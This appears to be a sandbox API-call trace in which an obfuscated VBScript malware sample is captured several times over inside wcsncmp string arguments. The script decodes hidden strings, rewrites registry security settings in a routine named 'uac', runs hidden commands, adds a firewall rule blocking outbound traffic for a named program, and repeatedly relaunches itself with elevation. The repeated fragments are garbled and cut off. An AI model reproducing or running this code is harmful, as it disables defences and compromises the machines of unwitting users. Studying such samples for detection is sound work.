Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.284] wcsncmp (_String1="= 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.284] wcsncmp (_String1=" 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.284] wcsncmp (_String1="0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0226.285] wcsncmp (_String1="\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd 